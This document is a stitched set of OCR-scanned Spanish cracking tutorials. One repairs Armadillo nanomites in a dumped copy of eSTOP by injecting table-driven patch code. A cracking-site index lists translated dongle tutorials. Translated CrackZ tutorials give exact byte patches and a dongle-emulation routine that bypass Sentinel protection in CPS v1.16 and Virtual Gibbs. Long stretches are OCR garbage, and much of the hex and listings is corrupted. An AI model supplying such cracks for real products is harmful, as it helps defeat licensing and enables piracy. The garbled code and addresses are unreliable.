archivo de texto donde bajará toda la información. 


Damos RUN y guarda la información que es muy sustanciosa si lo reparamos a mano, 
no es nuestro caso pero si hay algún nanomite o posición dudosa la lista nos quitara 
todas las dudas, además que nos da también una idea del camino que debe seguir el 
dumpeado para arrancar si uno ve que se cierra solo por ejemplo puede ver luego de que 
punto del LOG se cierra y adonde debería llegar lo que nos ayuda mucho a ver por 
donde se desvió el programa dumpeado con respecto al original. 


Aquí tenemos una vista del LOG para que se den cuenta de la importancia del mismo. 


: DO4B2727 

2 Tipo de Salto = 00000004 

2 "SALTA 1 no SALTA 0” -= BBBBBBB1 
: Saltara a ... = ba4u272C 


: BO402741 

2 Tipo de Salto = M0000BBB6 

2 "SALTA 1 no SALTA 0” -= BBBBBBAA 
: Saltaria a ... = 00402744 


: 10402746 

2 Tipo de Salto = M0BBBBBA 

2 "SALTA 1 no SALTA em = = 0000001 
: Saltara a ... = 00492 739 


: BO402741 

2 Tipo de Salto = 0000BBm6 

2 "SALTA 1 no SALTA Bb” -= 00000B0a 
: Saltaria a ... = 00402744 


: 00402746 

2 Tipo de Salto = BBBBBBBA 

2 "SALTA 1 no SALTA e” = = 0000001 
: Saltara a ... z 00402739 


: DO402741 

2 Tipo de Salto = 000000n: 

2 "SALTA 1 no SALTA 6” = Bananano 
: Saltariía a ... = 9n4027 44 


00402746 

2 Tipo de Salto = 00BBBBBA 

2 "SALTA 1 no SALTA Bb” -= 00B0BBBa 
: Saltaria a ... = 00402729 


ND: 00402748 

2 Tipo de Salto = 00000Bb4 

2 "SALTA 1 no SALTA_ 6” - 000000B1 
: Saltara a ... = 40402740 


: DB402727 

2 Tipo de Salto = 0000B0BB4 

2 "SALTA 1 no SALTA Mas = 00000001 
1D: Saltara a ... = Ba4B272Cc 


Con solo esta información podríamos reparar el programa a mano sin injertarlo miremos 
por ejemplo el primer nanomite en 402727 quiere decir que el tipo de salto es 04 que era 
JMP (EB) y allí dice saltara a 40272C así que en resumidas cuentas debo ir en el 
dumpeado a 402727 y escribir JMP 40272C. 


Y así todos los saltos se podrían reparar con la tablita que sale en el LOG el 
problema es que para eso debemos ejecutar todo el programa y quizás algun 
nanomite no lo ejecutemos y quede sin reparar por lo que este LOG es muy 


importante y lo usaremos como ayuda por si el injerto tiene algún error o le falta 
algún nanomite dudoso. 


bueno adjuntare la fila txt que tiene el LOG TO FILE del ESTOP. 
COMO REALIZAR EL INJERTO 


Bueno en el dumpeado le agrego dos secciones mas (puede ser con TOPO o SNIPPET 
CREATOR) una sección de mas o menos 5000 bytes para las tablas y otra de 500 bytes 
mas o menos para el injerto. 

Tenemos la ubicación de las tablas en el PADRE como vimos en la parte 1 asi que 
debemos copiar las mismas al dumpeado, 


bbiS3I0S AY 
4D FC mol Copy 


'FFEVSILE 
FFEO31A 


An Y 


DaBa e) Breakpoint » Fill with 00's 
BBBA El Search for > Fill with EF's 


1151515) 
alalals 


Follow DWORD in Dump 


Go to Binary copy 
Binary paste 
vw Hex AAA 
Text 
Short 
77F6664A 
e 77ES98EC| RET 
Float FEFFFFFF 
Disassemble 
Special 
Appearance » O12FESC : 5034 
3 B12FE40| BOBBBESC 
E 550.56. 0012FE44| BC44F1DS 
Bb -50. 3568. 99 ¿ 
00 P6B. 366. 0012 
00 “60.160. 0n12 
aña A IA ani2 


bueno allí vemos las tablas en el DUMP y marco desde el inicio de la primera hasta el 
final de la ultima tabla y luego click derecho BYNARY- BYNARY COPY y luego voy 
al dumpeado y marco una gran parte de la sección mas grande que agregue y hago 
BYNARY PASTE y corroboro que este todo incluido. 

Luego guardo los cambios para que quede esa sección ya completa. 


En mi caso las tablas quedaron en 


TABLA 1: 678000 
TABLA 2: 678798 
TABLA 3: 678B88 
TABLA 4: 678990 


Lo cual puedo verificar buscando la cadena de bytes donde se inicia cada una en el 
padre y buscándolas aquí en el dumpeado. 


Bueno en la otra sección escribiremos el injerto, es este ahora lo explicaremos. 


XOR ECX, ECX 


3309 

8B048D 00806701 MOUV_EAX, DWORD_PTR DS: [ECX*4+678000] 
DFB691 983876701 MOUZX EDX,BYTE PTR DS: [ECx+678798] 
O 3838B1 MOV led PTR DS: [ECX*4+678B88] 


41 

S1FE FFOG0000 
OFSF D4000000 
S1FB DIFFFFFF 
greC CSBeRono 


CMP EBX,DBFF 
CMP EBX,-BFF 


66:4B 
66:83FA 61 
75 04 
66:BA_7000 
66:83FA B2 
75 04 
66:BA_790B 
66:83FA 83 
75 04 
£66:BA_7D60 
66:83FA M4 
75 04 


A a e a e e 
IMOODODODODODoODoO 
DODDDDDDDDDDDDD 
on 

XX 

- 


oz 
=4=) 
= 
O 
ES 
y 
o 


z 
o 
<TD 
[=, 
XIX 
“JD 
0D 


D 


3 


=NO 
OMZz 
<MNTD 
DNoOo 
XIX 
A 

mm] 


4 


o 
4 
3 
o 
| 


ll 66:BA_EBOB MOU DX, BEB 
66:83FA 05 CMP Dx, 5 
75 04 JNZ SHORT dumpedlo.8867A973 
66:BA_7300 MOU Dx, 73 
66:83FA 06 CMP Dx, 6 
75 04 JNZ SHORT dumpedlo.8867A87D 
66:BA_7400 MOU Dx, 74 


66:83FA B7 M 
75 04 


66:BA_760B MOU Dx, 76 
66:83FA 43 CMP Dx,8 


o 
3 
2 
== 


66:BA_7r6bBb 
66:83FA BS 
75 04 

66:BA_7300 
66: 83FA B9 
75 04 

66:BA_7FDO 
66:33FA BA 
Y5 M4 

66:BA_7500 
S| 66:83FA OB 
Sl 75 04 
| £66:BA_ 7100 
66:383FA BC 


75 04 
66:BA_77B00 
66:83FA BD 
75 04 
66:BA_7ABD 
66:83FA BE 
75 04 
66:BA_7BDO 
66:83FA BF 
75 04 
66:BA_7EBD 
66:83FA 10 
75 04 

EB 18 
90 


8 


OZtO 
HOXZ 
TDTEMTD 
Do0NOo 
XX xXx 
yl 
00 


ONO =ZMNO= 
ZOZZOZZO 
TDENTDEMNMTE 
OO0NoODONoOoO 
IX XX IX 
SADO SD 
e 00D 


.=, 


= 
E 
ES 
O 
ae 
SS 
J 


o 
=: 
= 
mm] 
xXx 
| 
o 


oz 
zo 
me 
oo 
FX 
y 
mo 


=r< 
o 
L= 
mm] 
x 
yl 
om 


o 
z 
al 
mm] 
xXx 
| 
5 


oz 
E du] 
w< 
[Ja 
XX 

E 
SS 
om 


el 


OP 


90 
66:83FA 11 
75 04 
66:BA_9000 
66:83FA BB 
75 04 

EB 07 
90 
90 
33108 

3858 01 

3D 297984500 
7 FOFEFFFF 


oz 
pa q] 
Tu 
o 
xXx 
. 
a 


5 


B 


=: 
o 
£ 
o 
Xx 
.D 
o 


o 
=« 
3 
o 
xXx 


i 
o 
5 


MOU BYTE PTR DS: [ERAXJ, DL 
MOU BYTE PTR DS: [EAX+1],BL 


Cap AA 
NOP 
NOP 
NOP 
NAP 


Allí esta el injerto completo, lo explicaremos paso a paso. 

0067A000  33C9 XOR ECX,ECX 

Ponemos ECX a cero ya que será el puntero que navegara por las tablas. 
0067A002 > 8B048D 00806700 MOV EAX,DWORD PTR DS:[ECX*4+678000] 


En la segunda línea como ya habíamos explicado mueve a EAX el primer valor de la 
tabla 1 (si en sus maquinas empieza en otra posición cambiaran 678000 por el valor 
correspondiente). 


00674009 0FB691 98876700 MOVZX EDX,BYTE PTR DS:[ECX+678798] 


En la próxima línea mueve a EDX el valor de la tabla 2 correspondiente al tipo de salto 
(también aquí 678798 es el inicio de tabla 2 en mi maquina cambiarlo en la suya) 


0067A010  3E:8B1C8D 888B6>MOV EBX,DWORD PTR DS:[ECX*4+678B88] 


Aquí mueve a EBX el valor de la tabla 3 que representa la distancia que saltaría y aquí 
también 678B88 es el inicio de tabla 3 en mi maquina cambiar en la suya por su valor 
correcto en su maquina) 


Luego DEC EAX ya que sabemos que en la tabla 1, para hallar el valor de la posición 
del CC hay que restarle 1 y INC ECX para incrementar el puntero para el loop . 


0067A01A 81FB FF000000  CMP EBX,0FF 
0067A020  0OF8SF D4000000 JG dumpedlo.0067A0FA 
00674026 81FB O1FFFFFF CMP EBX,-0FF 
0067A02C  0F8C C8000000 JL dumpedlo.0067A0FA 


Esta parte es para evitar que se procesen valores de la tabla 1 que no sean saltos cortos, 
se sabe que como EBX tiene la distancia a saltar en formato DWORD, cuando ese valor 
es superior a O0OO000FF o menor a -000000FF el salto no es corto pues excede el valor 
máximo de la segunda cifra que es de FF a—FF. 

Si no cumple esas condiciones no procesa ese valor o es nanomite 


0067A03F  66:4B DEC BX 
El valor del segundo byte del salto también había que decrementarlo en 1. 


Luego viene la parte que convierte el valor de la TABLA 2 del tipo de salto en el 
verdadero valor de cada tipo de salto según la conversión habiamos hecho en la primera 
parte. 


0067A041 66:83FA01  CMPDX,l 

0067A045 75 04 JNZ SHORT dumpedlo.0067A04B 
0067A047 66:BA 7000 MOV DX,70 

0067A04B  66:83FA 02. CMP DX,2 

0067A04F 7504 JNZ SHORT dumpedlo.0067A055 


0067A051 
0067A055 
0067A059 
0067A05B 
0067A0SF 
0067A063 
0067A065 
0067A069 
0067A06D 
0067A06F 
0067A073 
0067A077 
0067A079 
0067A07D 
0067A081 
0067A083 
0067A087 
0067A08B 
0067A08D 
0067A091 
0067A095 
0067A097 
0067A09B 
0067A09F 
0067ADA1 
0067ADAS 
0067ADA9 
0067ADAB 
0067ADAF 
0067A0B3 
0067A0B5 
0067A0B9 
0067A0BD 
0067AOBF 
0067A0C3 
0067A0C7 
0067A0C9 
0067A0CD 
0067A0D1 
0067A0D3 
0067A0D7 
0067A0DB 
0067A0DD 
0067A0DF 
0067A0EO0 
0067A0E1 
0067A0E5 
0067A0E7 
0067A0EB 
0067A0EF 


66:BA 7900 MOV DX,79 

66:83FA 03  CMP DX,3 

75 04 JNZ SHORT dumpedlo.0067A05F 
66:BA7D00  MOVDX,7D 

66:83FA04 CMPDX,4 

75 04 JNZ SHORT dumpedlo.0067A069 
66:BA EB00 MOV DX,0EB 

66:83FA05  CMPDX,S5 

75 04 JNZ SHORT dumpedlo.0067A073 
66:BA 7300 MOV DX,73 

66:83FA06  CMPDX,6 

75 04 JNZ SHORT dumpedlo.0067A07D 
66:BA 7400 MOV DX,74 

66:83FA 07  CMP DX,7 

75 04 JNZ SHORT dumpedlo.0067A087 
66:BA 7600 MOV DX,76 

66:83FA08  CMP DX,8 

75 04 JNZ SHORT dumpedlo.0067A091 
66:BA 7800 MOV DX,78 

66:83FA09  CMPDX,9 

75 04 JNZ SHORT dumpedlo.0067A09B 
66:BA 7F00. MOV DX,7F 


66:83FAVDA  CMP DX,0A 


75 04 JNZ SHORT dumpedlo.0067A0AS 
66:BA 7500 MOV DX,75 

66:83FAOB  CMPDX,0B 

75 04 JNZ SHORT dumpedlo.0067A0AF 
66:BA 7100 MOV DX,71 

66:83FA0C  CMP DX,0C 

75 04 JNZ SHORT dumpedlo.0067A0B9 
66:BA 7700 MOV DX,77 


66:83FA0D  CMP DX,0D 

75 04 JNZ SHORT dumpedlo.0067A0C3 
66:BA7A00  MOVDX,7A 

66:83FAOE  CMP DX,0E 

75 04 JNZ SHORT dumpedlo.0067A0CD 
66:BA7B00 MOV DX,7B 

66:83FA0OF  CMP DX,0F 

75 04 JNZ SHORT dumpedlo.0067A0D7 
66:BA 7E00 MOV DX,7E 

66:83 FA 10  CMPDX,l0 

75 04 JNZ SHORT dumpedlo.0067A0E1 
EB 1B JMP SHORT dumpedlo.0067A0FA 
90 NOP 
90 NOP 
66:83FA 11 CMPDX,11 
75 04 JNZ SHORT dumpedlo.0067A0EB 
66:BA 9000 MOV DX,90 

66:83FA00  CMPDX,0 

75 04 JNZ SHORT dumpedlo.0067A0F5 


0067A0F1  EB 07 JMP SHORT dumpedlo.0067A0FA 
0067A0F3 90 NOP 
0067A0F4 90 NOP 


vemos que si es DX=1 como era en la tabla 2 lo cambia a 70 que es el código de ese 
tipo de salto (JO) y así todos, los valores 00, 10 y 11 además que en el LOG no 
aparecen en ningún nanomite de esos valores, así que en esos luego de la comparación 
va a un salto directo a evitar ser procesados si en algún otro armadillo se usaran hay que 
agregarle esa parte. 


0067A0FS 8810 MOV BYTE PTR DS:[EAX],DL 
0067A0F7 8858 01 MOV BYTE PTR DS:[EAX+1],BL 
O067AOFA 3D 97984500  CMP EAX,dumpedlo.00459897 
0067A0FF 2 0F8C FDFEFFFF JL dumpedlo.0067A002 
0067A105 90 NOP 

0067A106 90 NOP 


y aquí es donde realiza el parche mueve a EAX (posición del INT3) el valor del 1er byte 
del salto, y a EAX + 1 mueve el 2do byte del salto, y luego compara EAX si llego al 
máximo NANOMITE de la TABLA 1 para terminar el proceso. (cambiar este valor en 
otros armadillos según necesidad) 


también es obvio que en el injerto hay que verificar la relación entre los valores de la 
TABLA 2 y el tipo de salto que no cambie si no adecuar también esos valores. 


Y luego pongo un BPX en el NOP para que termine, por supuesto guardo los cambios 
para que quede definitivo el injerto, aunque luego de reparado el ejecutable puedo 
eliminar las dos secciones agregadas ya que no sirven ya mas. 


En el inicio del injerto marco 
0067A000  33C9 XOR ECX,ECX 
Y hago NEW ORIGIN HERE 


para correrlo, hago RUN y cuando para en el BPX habrá reparado todos los nanomites 
de saltos cortos, ahora voy al entry point del dumpeado 


00438B77 > 55 PUSH EBP 


Hago allí NEW ORIGIN HERE y luego RUN y el programa arranca perfectamente 
salvo que me da un error mientras se ejecuta en el único punto que no reparo el injerto 
el salto largo que quedaba, si hay mas de uno, debemos repararlo a mano también, asi 
que 


El error se produce aquí en este nanomite 
0040878F CC INT3 


00408790  185E CO SBB BYTE PTR DS:[ESI-40],BL 
00408793  C2 378B RETN 8B37 


Busco en el LOG a ver que debo colocar en su reemplazo 


005C5E55 COND: 0040878F 

005C5EE7 COND: Tipo de Salto = 0000000A 
0O5CS5EFS COND: "SALTA 1 no SALTA 0" = 00000001 
005C5FOD COND: Saltara a ... =004088BB 


Aquí esta la información de ese nanomite vemos que es tipo de salto OA que 
corresponde a JNE y que saltaría a 4088BB así que voy al dumpeado y pongo 


JNE 4088BB 


EZ 0 “1*] $143 Y) 3 E 


aS7SF|w Edo 26616006 | JN£ dumpedlo. 0040S83BB 
ni DCFFFFS3 [TEST DWORD PTR DS: [EAX+S3FF 
ADD_ESP, ECX 


Allí esta no debemos olvidar el NOP que agrego el OLLY de quitarlo ya que eso rompe 
la siguiente sentencia 


dx] >Ju) 09] $10) + 1JEJm/T)w]H] 


OE w¿0F35 26010000 | JN2 dumpedlo. 664BS38BB 
3408 Í 38685 ASDCFFFF [MOU EAX, DWORD PTR SS: [EBP-2358] 
3408 SSL s3FS 61 CMP EAX, 1 


listo ya esta perfectamente reparado ahora guardo los cambios corro el programa yyy... 


=> £STOP! - SE 3.21 
eSTOP! se k 


6 ok Sep eS TOP! News Web Link 
Help?) NWPS Inc Web Site 


Purchase esTOPI! 


8 Lock Dut All TCP Connections A 


Double-click on an entry below to stop the connection. Right-click for action menu. 


“Your IP:Port->Comments Their IP:Port->Comments Comments 


E) 3 200.81.23.238:2013->? 207.46.106.76:1863 (baym-c....  esTOP! this connection P 


Ahora si funciona perfecto jeje. 


Ricardo Narvaja 
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LOAD_DLL base: 0C000000 SCHKCORE.DLL 
Usemame: Default 

Machine: DEMCOMPUTER 

Date: 23/0603 03:09:50 p.m. 

LOAD_DLL base:5FDO0000 

LOAD_DLL base:BFB 70000 COMCTLS32. dll 
LOAD_DLL base:50000000 MSCTF. dll 
LOAD_DLL base:BFE70000 WERSION.dil 
LOAD_DLL base:?FF20000 ole32. dll 
LOAD_DLL base:?79B0000 OLEAUT32. dil 
EXIT_PROCESS 


For Help, press F1 
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Symbols cannot be loaded. 2 
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Traducciones 


Seccion dedicada a las Traducciones, aqui vas a encontrar muchisima informacion en 
español, gracias a los traductores podemos acceder a tantos documentos que de otra 
orma nos seria imposible entender, a los que no sabemos ingles. 


Protecciones por Hardware 


En este apartado pondremos Todos los documentos que se van traduciendo de la seccion 
Colaborar o de cualquier otro destino y que esten relacionados con las protecciones 
mediante Hardware (Motxilas). De entrada os doy las gracias a todos los que colaborais 
con esta pagina en cualquiera de sus secciones. (GRACIAS) 


- NOTA Los originales de estas Traducciones los teneis en la seccion Colaborar 


La Envoltura HASP 8: Técnicas para 
Crackear HASP 


Cimatron 10 beta HASP CrackZ illano B. 17/07/2001 
Eyesys Windows Workstation 2.11W CrackZ Mnemox 17/07/2001 


SSI Win32 Dongle Protection Aftosa 17/07/2001 
SENTINEL Spyder 
SST Win32 Dongle Protection illano B. 17/07/2001 


Hasp dongle emulator v1.3 by Tony Lee 


Ejemplo de Motxilas Hasp, + Codigo Fuente 
en Visual Basic 


-Aladdin Knowledge 


Empakados PE 


En este apartado pondremos Todos los documentos que se van traduciendo, de la 
seccion Colaborar o de cualquier otro destino y que esten relacionados con los 
Empakados PE. De entrada os doy las gracias a todos los que colaborais con esta pagina 
en cualquiera de sus secciones. (GRACIAS) 


- NOTA Los originales de estas Traducciones los teneis en la seccion Colaborar 
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Traducciones en General 


En este apartado Encontrareis las traducciones de la documentacion de distintas 
herramientas o cualquier otro documento que puedan ser interesantes y que os 
apetezca traducir :-) 


TITULOS AUTOR TRADUCTOR 


59 Manuales sobre Cracking 
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Haciendo un KeyGen para CrackersConvert v1.0 (CrackME olatility xeli (23/06/00) 
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Pequeña Introduccion Al Cracking (en PDF) Inmortal Descendasts xeli (16/06/00) 


RACKER's NOTAS Español xeli (01/06/00) 
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raduccion esta hecha en formato help, para poder Antica 0102100) 
ustituirla por el original. 
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TKC TRADUCCIONES 


Aqui estan los manuales que vienen en el Oscar o los manuales de TKC igual da, los ha 

raducido Muñoz , y quiero agradecerle su super dedicacion con este proyecto, gracias 
Muñoz. Como sabeis cada capitulo trae informacion sobre como crackear 3 o 4 
programas, osea que imaginaros la de ingormacion que teneis aqui :-) 
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Espero Todo Tipo De Colaboración y Sugerencias. ¡¡ No os Cortéis !! 


> karpoff welcome.to S 


Karpoff da 


CPS v1.16 - Tutorial 


Saludos nuevamente y ¡bienvenido a otro 'dongle tutorial' solicitado por ustedes! De hecho CPS v1.16 se ajusta perfectamente 
a mi site ya que usa un Sentinel parecido a GeoPatch Power CAD/CAM, con la única diferencia de la librería 'SCW32.DLL' de 
32 bits en lugar de la librería 'SCW16.DLL”. El desensamblado del '.EXE' principal lleva un buen rato, aunque merece la pena 
esperar; un rápido filtrado de las funciones 'import' nos proporcionará algo de código con el que poder empezar. 


Nos aventuramos dentro de SoftICE; un 'BPIO -h 378 RW" funcionará; el primer break es el que se produce dentro de la 'DLL' 
de la mochila, por lo que desactivamos el breakpoint y empezamos a pulsar F12 para regresar al código de la aplicación. 
Llegaremos al punto de entrada a éste código: 


:00419082 CALL 0056859B <--— Aterrizaremos Justo después de ésto 
(RNBOcplusInitialize). 

:00419087 MOV WORD PTR [EBP-1C], AX <-- Guarda AX 

:0041908B MOV EDX, DWORD PTR [EBP-1C] <-- Ahora pone ésto en EDX 
:0041908E AND EDX, 0000FFFF <-— Lo limpia 

:00419094 TEST EDX,EDX <-— Comprueba EDX 

:00419096 JZ 004190C5 < Puede que no sea un 'bad jJump' 


Este código puede que no funcione tal como su su intuición pueda sugerirle; el 'JZ' parece que debiera ser el 'bad jump', pero si 
continuamos con la ejecución del código veremos que nos lleva a un rápido 'RET", con lo que de éste modo nos saltamos 
ambos 'CALL' a RNBOcplusRead (que debemos suponer acceden a la mochila). Sin tener que echar un vistazo a la guía API 
para éste viejo Sentinel suponemos que RNBOcplusInitialize hacer realmente éso; podríamos tracear y buscar signos 
delatadores (ie., 378 en un registro), lo que sería indicativo de que se está obteniendo la dirección del puerto paralelo. Vamos a 
suponer que esto es correcto u continuemos. 


:004190C5 MOV WORD PTR [0075F5F4], 0000 <-- Pone éste flag a O 
:004190E2 XOR EDX,EDX <-—- EDX=0 (¿Quizás innecesario) 

:004190E4 MOV DX, WORD PTR [0075F5F4] <-- Mueve el flag a DX 
:004190EB CMP EDX, DWORD PTR [EBP-18] <-- Otra comprobación del flag 
:004190EE JGE 00419159 <--— Salta y se prepara para leer la mochila 


Este código es interesante; '[EBP-18]' es el flag crítico y obviamente es activado en algún sitio por el código de la 'DLL' de la 
mochila; todo el tiempo he podido observar que el flag es puesto a '5'; casi con certeza puedo decir que ésto es un código de 
error API que quiere decir "Mochila no presente" o algo parecido; probablemente el único código bueno de '[EBP-18]' sea '0'; 
pero observe que se hace un 'CALL' a RNBOcplusRead si éste salto no se produce; ésto símplemente es un bucle para 
comprobar nuevamente la presencia de mochilas. También sabemos que el código 'XOR EDX,EDX' y 'MOV DX' ponen 
'EDX=0", aunque ésto ya estaba en el anterior trozo de código; con lo cual podemos usar ése espacio de direcciones aquí para 
poner '[EBP-18]' a '0' que es lo que necesitamos. 


Parche 


:004190E4 MOV WORD PTR [EBP-18], 0000 <-— Poner bien el flag de memoria (66, C7, 45, 
E8, 00, 00, 90). 


Este parche nos garantiza que nuestro mochila ya existe y pone '[EBP-18]' de acuerdo a éllo por si se dá el caso de que sea 
comprobado posteriormente. Seguimos con el siguiente trozo de código. 


:00419159 MOV WORD PTR [0075F5F4], 003F <-- Sabido: cantidad de datos de la mochila a 
leer 


:00419162 PUSH 0075F1E8 <-- Guardar paquete 

:00419167 MOV DX, WORD PTR [0075F5F4] <-- Guarda '3F' en 'DX' 

:00419174 CALL 00568595 <--— RNBOcplusRead. 

:00419179 MOV WORD PTR [EBP-1C], AX <-- Usa 'AX' para código de retorno de estado y 
lo guarda 

:0041917D MOV WORD PTR [0075F5F4], 0005 <--— Lo guarda de nuevo 

:00419186 XOR EAX,EAX <-- Borra EAX. 

:00419188 MOV AX, WORD PTR [0075F1E8] <-- Vuelve de la mochila (¡es FFFF!). 
:0041918E XOR ECX,ECX <-- Borra ECX 

:00419190 MOV CX, WORD PTR [0075F5F4] <-- Conocemos éste valor 

:00419197 XOR EDX,EDX <-- Borra EDX 

:00419199 MOV DX, WORD PTR [EBP+2*ECX-28] <-- DX=valor de retorno "correcto" (5460h) 
:0041919E CMP EAX,EDX <-- Comparación 

:004191A0 JZ 004191CcC <-- Salto correcto y pone los flags adecadamente [EBP-40] 


Esta es la rutina principal de comprobación de la mochila; cuando la traceamos y vemos que 'AX' retorna con 'FFFF (-15, la 
palabra error debe presentarse inmediatamente en nuestro cerebro; el valor correcto '5460h" queda desgraciadamente en el 
registro 'DX' para la comparación; obviamente tenemos tres modos de parchear ésto; la mejor opción es, probablemente, 
cambiar la instrucción de la posición '00419188' a'MOV AX,5460h' y rellenar lo sobrante con los apropiados 'NOPs'; (ie., 66, 
B8, 60, 54, 40, 48). 


Una vez más vemos una vulnerabilidad inherente a éste tipo de Sentinel; la estructura del API nos da a entender que cualquier 
'Reverse Engineer" reflexionando un poco puede fácilmente encontrar el camino hacia el código. Cualquier esquema decente 
debería en realidad usar una respuesta d ela mochila para desencriptar parte de código cargado y, obviamente, comprobar la 
presencia del a mochila más de una vez. Aunque no demostrado cómo, debería ser posible el parcheo genérico de la 'DLL'; en 
lugar de devolver 'FFFF' como un error, debería ser posible incrustar código dentro de la 'DLL' para que recupere el código de 
retorno correcto. 


O 1998 CrackZ. 1st November 
Traducción: MeGaBiTe 


Virtual Gibbs v5.05 - Tutorial 


http://www.gibbsnc.com/ - Webpage (v4.29 / v5.04 / v5.05 / v5.11). 


Traducción 


Esta traducción está hecha, en forma de agradecimiento a los crackers ke han tenido la gentileza de escribir sus experiencias 
para iluminar el camino a gente ke como yo, estamos empezando en el universo del Cracking, una mención especial para los 
que se han tomado la molestia de contestar mis peticiones de ayuda en los foros de Visual Basic y crackin'. Espero esta 
traducción sea de su agrado, animo Crackers, Newbies, que necesitamos ser una generación nueva, que lleve al máximo este 
noble arte, saludos a todos, en especial a Karpoff, WKT, y a todos los ke han dejado huella. Atte. “[G]JoLe[E]" 


Un poco de historia 


La Razón por la cual escribí este tutorial, es porque siempre he hecho parches para Virtual Gibbs, desde la versión 4.23 mas o 
menos, y siempre he sido capaz de cambiar unos cuantos bytes y fácilmente crackear la protección dongle. Este era el caso 
hasta la versión 5.0, después de la cual, los desarrolladores comenzaron a usar sus dongles un poco mas funcionalmente 
controlables (específicamente las opciones de milling) con palabras recuperadas del dongle. 


En la v5.04 encontré difícil de hacer los mencionados parches usando solamente intuición, creé un nuevo método para esto y 

aquí fue donde decidí tratar de emular el dongle, usando la rutina Centinela Principal (después de todo, he estado haciéndolo 

con HASP por 2 años o más). Virtual Gibbs usa una clase de SentinelPro, la especificación API que he visto que quedan bien 
con el código. Una marca de fabrica que he visto muchas veces en los Centinelas, es la verificación de un récord de paquetes 

que parecen comenzar siempre con "Br" (como sería vista en memoria). 


Usualmente, esto nos provee de una conveniente búsqueda de palabras y Centinelas, ya que no poseemos un PE de 
encriptación real para ocultar este código (definitivamente es una función de librería). La mayoría de tiempo, lo he visto 
compilado con ESL, así, CMP WORD PTR [ESI], 7242 usualmente es bastante efectivo, pero en una PC rápida, "7242' es lo 
suficientemente limitado. De la guía del API Centinela, noté que el parásito SuperPro tiene reservadas 8 4 56 celdas con 
propositos generales, las primeras 8 (0-7) están reservadas (teniendo significados especiales) y no pueden ser reprogramadas. 


Esto por supuesto, tiene sentido si has leído alguno de mis otros documentos acerca de centinelas, los cuales hacen énfasis en 
un 'PUSH 3F, por ejemplo, 63 (la última celda de la dongle) a un API Centinela del tipo sproRead(), cada celda es una 
PALABRA (WORD). mi idea principal por eso, fue hacer un bpx para este código "read Word" y chequear los registros y la 
pila para ver que registros pasaron en la función, por búsqueda simple en w32Dasm, encontramos 13 casos de "emp eax, 7242" 
y 1 "mov word ptr [eax], 7242" lo cual, obviamente no es interesante (es mas parecido a algún tipo de inicialización de la 
estructura). 


Algunos de estos chequeos "7242", probablemente son "inocentes", es decir, sin importancia, en la mayoría de Centinelas que 
he visto, usualmente han habido 13 casos del tipo "7242' compiladas muy juntas, sin embargo, es posible ajustarlas, usando una 
combinación de técnicas, buscando las funciones de llamada (CALLS), podemos chequear los parámetros que fueron 
empujados y aparearlos con la guía API, las llamadas inocentes a SprolInitialize(), el cual debe ser realizado para no tomar 
parámetros y poder así poder ser descartados, también he encontrado que el bpx usual a las API de la dongle con sentido 
simple para los call, retornando AX=3, es otra buena técnica de localizar la llave de la función Centinela. 


:OO6CAEAO PUSH 00000175 <-— ID del Desarrollador. 
:O00O6CAEAO PUSH 008948A0 <-— Empujar los paquetes Grabados. 
:OO6CAEAA CALL 00787FD1 <--— Esto solo Puede ser sproFindFirstUnit (). 


Este primer descubrimiento (el cual encontré haciendo un bpio -h 378 rw y F12 funcionó) solo puede ser sproFindFirstUnit(), 


no puede ser ninguna otra de las funciones API documentadas, debido a los parámetros empujados, este código también puede 
decirnos que PUSH 008948A0 es realmente un PUSH paquetes_Grabados, el cual debe ser el caso para Cualquier llamada 
APLI. Refinemos la búsqueda y esos bpx. 


:O006CAE5E PUSH 00001004 <-— Empujar Packet_Len. 

:006CAE63 PUSH 008948A0 <-— Empujar los Paquetes Grabados. 

:006CAE68 CALL 00787D6E <--— Inicializa los valores default del sproFormatPacket () 
:006CAE81 PUSH 008948A0 <-— Empuja los Datos Grabados 

:006CAE86 CALL 00787DBA <-— chequea el Centinela sproFindNextUnit () 

:O006CAEF9 PUSH EAX <-— Puntero a donde la palabra será retornada 8. 

:O00O6CAEFE ADD ECX, 10 

:006CAFO1 PUSH ECX <-- Dirección a ser leída. 

:006CAFO2 PUSH 008948A0 <-— Empujar los paquetes grabados. 

:O006CAF0O7 CALL 007882BE <--— sproRead(). 


Bien, viendo esto, notamos que todo está acá, ahora solo necesitamos un bpx para 6CAESE y verlo desdoblado frente a 
nuestros ojos, nuestro primer parche será sproFindFirstUnitO), yo cambie el MOV AX, 2 por MOV AX, O y redireccioné el JZ a 
este nuevo código (un cambio de 2 Bytes) :- 


:00787FEF CMP EAX, 7242 <-- Es el paquete grabado valido 
:00787FF4 JZ 00787FFA <-- por supuesto, es este. 
:00787FFA MOV AX, 0 <--— ahora es valido. 


Este cambio, resulta en un "La llave de Hardware no funciona ("Hardware key does not match flavor"), probablemente te has 
figurado que sproRead() debe ser el culpable, veamos esto, ahora mira a lo que está en la pila:- 


AO 48 89 00 11 00 00 00 04 FD 3D 01 


AAAAAAAAANAOA AAAAAAAAAAN AAAANAAAAANAOA 
Paquete Dirección Dirección 
Grabado a leer a Almacenar 


Puedes ver, presionando FS varias veces que la dirección a leer cambia cada vez, las palabras 11-17 incluso, son verificadas, 
así que reescribirémos este código para simular la presencia de nuestra dongle. 


:007882E1 JZ 007882E7 (0F 84 00 00 00 00) <--— Paquete de Datos Validados. 
:007882E7 PUSH EBP (55) 

:007882E7 MOV EAX, [ESP+20] (8B 44 24 20) <--— Obtiene la dirección a leer. 
:007882EB SHL EAX, 1 (D1 E0) <-- Como estamos emulando una WORD. 

:007882ED CALL $+5 (E8 00 00 00 00) 

:007882F3 POP EBP (5D) <-- Establecemos el Delta. 

:007882F4 LEA EDI, [EBP+1C] (8D 7D 1C) <--— Donde comenzara la memoria simulada. 
:007882F7 MOVZX EAX, WORD PTR [EAX+EDI] (0F B7 04 38) <--— Recuperando el WORD. 
:007882FB MOV EDI, [ESP+24] (8B 7C 24 24) <-- Obtiene la dirección para colocar la 
dongle WORD. 

:007882FF MOV [EDI],AX (66 89 07) <--— Colocándola. 

:00788302 XOR EAX, EAX (33 C0) <-- Exito. 

:00788304 POP EBP (5D) 

:00788305 POP EDI (5F) 

:00788306 POP ESI (5E) 

:00788307 POP EBX (5B) <-- POP registrado de la pila, como es requerido. 


:00788308 LEAVE (C09) 
:00788309 RET 0C (C2 0C 00) <-- Fin. 


Ahora todo lo que necesitamos haces, es un bpx para nuestra rutina de simulación, y seguir cada WORD como es chequeada. 
para habilitar todas las opciones, el siguiente valor podría ser usado. 


Word Valor 
11 0400 
12 0001 
13 O0EF 
